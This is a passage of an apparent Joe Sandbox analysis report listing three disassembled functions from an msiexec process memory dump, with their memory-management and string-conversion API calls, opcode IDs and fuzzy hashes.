                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 231171946-0
                                                                                                                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                          Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3669619086-0
                                                                                                                                                                                                          • Opcode ID: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                          • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                          Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                                                          • Opcode ID: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5